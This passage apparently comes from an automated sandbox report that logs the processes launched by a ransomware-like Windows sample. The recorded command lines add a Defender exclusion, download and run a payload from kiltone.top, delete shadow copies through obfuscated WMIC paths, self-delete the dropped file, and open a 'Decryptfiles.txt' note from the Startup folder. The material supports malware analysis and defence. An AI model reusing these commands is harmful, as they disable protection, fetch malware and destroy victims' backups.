                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:18
                                                                                                                                              Start time:01:52:30
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:19
                                                                                                                                              Start time:01:52:30
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\control.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
                                                                                                                                              Imagebase:0x7ff77f100000
                                                                                                                                              File size:164'352 bytes
                                                                                                                                              MD5 hash:11C18DBF352D81C9532A8EF442151CB1
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:20
                                                                                                                                              Start time:01:52:30
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl
                                                                                                                                              Imagebase:0x7ff687690000
                                                                                                                                              File size:71'680 bytes
                                                                                                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:21
                                                                                                                                              Start time:01:52:30
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl
                                                                                                                                              Imagebase:0xca0000
                                                                                                                                              File size:61'440 bytes
                                                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:23
                                                                                                                                              Start time:01:52:36
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                                                                              Imagebase:0xc50000
                                                                                                                                              File size:236'544 bytes
                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:24
                                                                                                                                              Start time:01:52:36
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:25
                                                                                                                                              Start time:01:52:36
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                                                                              Imagebase:0xfb0000
                                                                                                                                              File size:433'152 bytes
                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:27
                                                                                                                                              Start time:01:52:41
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
                                                                                                                                              Imagebase:0xc50000
                                                                                                                                              File size:236'544 bytes
                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:28
                                                                                                                                              Start time:01:52:41
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:29
                                                                                                                                              Start time:01:52:42
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
                                                                                                                                              Imagebase:0xfb0000
                                                                                                                                              File size:433'152 bytes
                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:30
                                                                                                                                              Start time:01:52:52
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:cmd /c %temp%/eryy65ty.exe
                                                                                                                                              Imagebase:0xc50000
                                                                                                                                              File size:236'544 bytes
                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:31
                                                                                                                                              Start time:01:52:52
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:32
                                                                                                                                              Start time:01:52:52
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp/eryy65ty.exe
                                                                                                                                              Imagebase:0x280000
                                                                                                                                              File size:902'856 bytes
                                                                                                                                              MD5 hash:2B986178DA0C3D081F99AC8FB4A5952C
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Antivirus matches:
                                                                                                                                              • Detection: 47%, ReversingLabs
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:33
                                                                                                                                              Start time:01:52:58
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete
                                                                                                                                              Imagebase:0x7ff72c250000
                                                                                                                                              File size:576'000 bytes
                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:34
                                                                                                                                              Start time:01:52:58
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:40
                                                                                                                                              Start time:01:53:08
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                                                              Imagebase:0x280000
                                                                                                                                              File size:902'856 bytes
                                                                                                                                              MD5 hash:2B986178DA0C3D081F99AC8FB4A5952C
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:41
                                                                                                                                              Start time:01:53:13
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\DHaecA\DHae\..\..\Windows\DHae\DHae\..\..\system32\DHae\DHae\..\..\wbem\DHae\DHaec\..\..\wmic.exe shadowcopy delete
                                                                                                                                              Imagebase:0x7ff72c250000
                                                                                                                                              File size:576'000 bytes
                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:42
                                                                                                                                              Start time:01:53:13
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:43
                                                                                                                                              Start time:01:53:16
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                                                              Imagebase:0x280000
                                                                                                                                              File size:902'856 bytes
                                                                                                                                              MD5 hash:2B986178DA0C3D081F99AC8FB4A5952C
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:44
                                                                                                                                              Start time:01:53:21
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\HMUcTz\HMUc\..\..\Windows\HMUc\HMUc\..\..\system32\HMUc\HMUc\..\..\wbem\HMUc\HMUcT\..\..\wmic.exe shadowcopy delete
                                                                                                                                              Imagebase:0x7ff72c250000
                                                                                                                                              File size:576'000 bytes
                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:45
                                                                                                                                              Start time:01:53:21
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:46
                                                                                                                                              Start time:01:53:28
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\ZRfAzX\ZRfA\..\..\Windows\ZRfA\ZRfA\..\..\system32\ZRfA\ZRfA\..\..\wbem\ZRfA\ZRfAz\..\..\wmic.exe shadowcopy delete
                                                                                                                                              Imagebase:0x7ff72c250000
                                                                                                                                              File size:576'000 bytes
                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:47
                                                                                                                                              Start time:01:53:28
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                                                              Imagebase:0xc50000
                                                                                                                                              File size:236'544 bytes
                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:48
                                                                                                                                              Start time:01:53:28
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:49
                                                                                                                                              Start time:01:53:28
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:50
                                                                                                                                              Start time:01:53:28
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                              Imagebase:0x890000
                                                                                                                                              File size:18'944 bytes
                                                                                                                                              MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:53
                                                                                                                                              Start time:01:53:34
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\notepad.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
                                                                                                                                              Imagebase:0x7ff71a6e0000
                                                                                                                                              File size:201'216 bytes
                                                                                                                                              MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:55
                                                                                                                                              Start time:01:53:41
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\ndvCaU\ndvC\..\..\Windows\ndvC\ndvC\..\..\system32\ndvC\ndvC\..\..\wbem\ndvC\ndvCa\..\..\wmic.exe shadowcopy delete
                                                                                                                                              Imagebase:0x7ff72c250000
                                                                                                                                              File size:576'000 bytes
                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:56
                                                                                                                                              Start time:01:53:41
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                                                              Imagebase:0xc50000
                                                                                                                                              File size:236'544 bytes
                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:57
                                                                                                                                              Start time:01:53:41
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:58
                                                                                                                                              Start time:01:53:41
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:59
                                                                                                                                              Start time:01:53:41
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                              Imagebase:0x890000
                                                                                                                                              File size:18'944 bytes
                                                                                                                                              MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:60
                                                                                                                                              Start time:01:53:47
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\RpnEVb\RpnE\..\..\Windows\RpnE\RpnE\..\..\system32\RpnE\RpnE\..\..\wbem\RpnE\RpnEV\..\..\wmic.exe shadowcopy delete
                                                                                                                                              Imagebase:0x7ff72c250000
                                                                                                                                              File size:576'000 bytes
                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:61
                                                                                                                                              Start time:01:53:47
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                                                              Imagebase:0xc50000
                                                                                                                                              File size:236'544 bytes
                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:62
                                                                                                                                              Start time:01:53:47
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:63
                                                                                                                                              Start time:01:53:47
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:64
                                                                                                                                              Start time:01:53:47
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                              Imagebase:0x890000
                                                                                                                                              File size:18'944 bytes
                                                                                                                                              MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:true

                                                                                                                                              No disassembly